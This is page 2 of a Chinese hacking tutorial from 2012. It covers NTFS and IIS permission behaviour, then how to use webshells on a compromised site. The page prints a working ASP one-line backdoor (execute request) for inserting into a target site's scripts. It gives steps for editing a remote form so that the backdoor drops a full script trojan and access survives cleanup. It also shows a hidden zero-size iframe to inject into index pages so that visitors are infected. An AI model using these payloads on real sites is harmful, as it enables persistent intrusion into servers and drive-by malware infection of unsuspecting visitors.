WEB开发网
开发学院网络安全黑客技术 黑客技术小盘点 阅读

黑客技术小盘点

 2012-07-18 19:35:49 来源:WEB开发网   
核心提示:(3)优先性,权限的这一特性又包含两种子特性,黑客技术小盘点(2),其一是文件的访问权限优先目录的权限,也就是说文件权限可以越过目录的权限,这样当以后脚本木马被删除时,后门文件如果存在,即可再次获得WBESEHLL,2)在网站挂木马,网页木马的配置和生成,在其它教程中已经有详细的介绍,这里不重复演示,挂木马其实很简单,

(3)优先性,权限的这一特性又包含两种子特性,其一是文件的访问权限优先目录的权限,也就是说文件权限可以越过目录的权限,不顾上一级文件夹的设置。另一特性就是“拒绝”权限优先其它权限,也就是说“拒绝”权限可以越过其它所有其它权限,一旦选择了“拒绝”权限,则其它权限也就不能取任何作用,相当于没有设置。

(4)交叉性是指当同一文件夹在为某一用户设置了共享权限的同时又为用户设置了该文件夹的访问权限,且所设权限不一致时,它的取舍原则是取两个权限的交集,也即最严格、最小的那种权限。如目录A为用户USER1设置的共享权限为“只读”,同时目录A为用户USER1设置的访问权限为“完全控制”,那用户USER1的最终访问权限为“只读”。

IIS的WEB目录下还有两种特殊的权限设置,就是脚本执行权限和列目录权限。

我们知道网站的构成基本上都离不开脚本,而脚本是在服务器上被执行后生成给客户浏览器访问的,如果没有脚本执行权限,网站的APS,PHP等脚本不会被执行也就无法被访问到网站的内容.有时上传到网站的木马,访问时发现显示的是源代码产没被执行,这就是该目录限制了脚本执行权限的原因。

列目录权限通常不能给予,如果给于WEB目录列目录权限,那么网站的目录以及文件,就会就在浏览器中被显示出来,这是极其危险的,这会让攻击者得到网站的源文件并且分析出漏洞,还能下载数据库得到管理员密码,风险不言而誉。

三、对Webshell的使用

1)在网站文件中插入后门:

插入后门,其本质就是将一段能接收远程地址发送信息的代码(俗称一句话木马)插入到网站脚本程序里,这个脚本程序是网站本身的程序,被插入一句话木马后,当远程提求该文件并提交的信息时,那段接收代码会接收并处理接收到的信息,如果提交的内容是的指令其生成一个脚本木马,同样也会被执行,这就是插入木马的原理。

后门相比WBESEHLL,,很隐蔽,也不生成新的文件,不易被查觉,因为在获得网站权限后插入后门几乎是必做的功课,一句话木马并不神密,这就是一段最常用的一句话木马代码---<%execute request("hacker")%>---把这段代码,放在目标网站原有脚本文件的首尾.这个文件即被安插了后门。

安插好木马后,使用远程提交表单,向被插入后门的文件提交脚本木马:

(1)打开表单,将第一行<form action= 后面的链接地址改成你插入木马文件的地址,比如http://www.XXXX.com/int.asp

(2)<textarea name=caicai cols=120 NAME参数改成<%execute request("hacker")%>request后的参数一样,如一句话木马中是hacker 这里一样改为hacker。

(3)lP.SaveToFile server.mappath("test1.asp")

response.redirect "test1.asp"

这两处的TEST1.ASP为生成后的脚本木马的文件名,进行相应的修改。

以上几处修改后保存为HTM后缀,打开后在填入木马内容的地方粘贴入要上传的脚本木马的内容,提交即可连接上生成的脚本木马。这样当以后脚本木马被删除时,后门文件如果存在,即可再次获得WBESEHLL。

2)在网站挂木马,网页木马的配置和生成,在其它教程中已经有详细的介绍,这里不重复演示,挂木马其实很简单,几乎90%的木马,都是通过<iframe src=http://www.sohu.com/index.asp width=0 height=0></iframe> 。其中SRC后面的就是你生成的网页木马的链接,将这个代码,插入网站文件即可(一般为INDEX.ASP.INDEX.HTM等被调用最多的文件),这样当别人上该网站访问到这个文件时就会中到木马。

上一页  1 2 

Tags:黑客技术 盘点

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接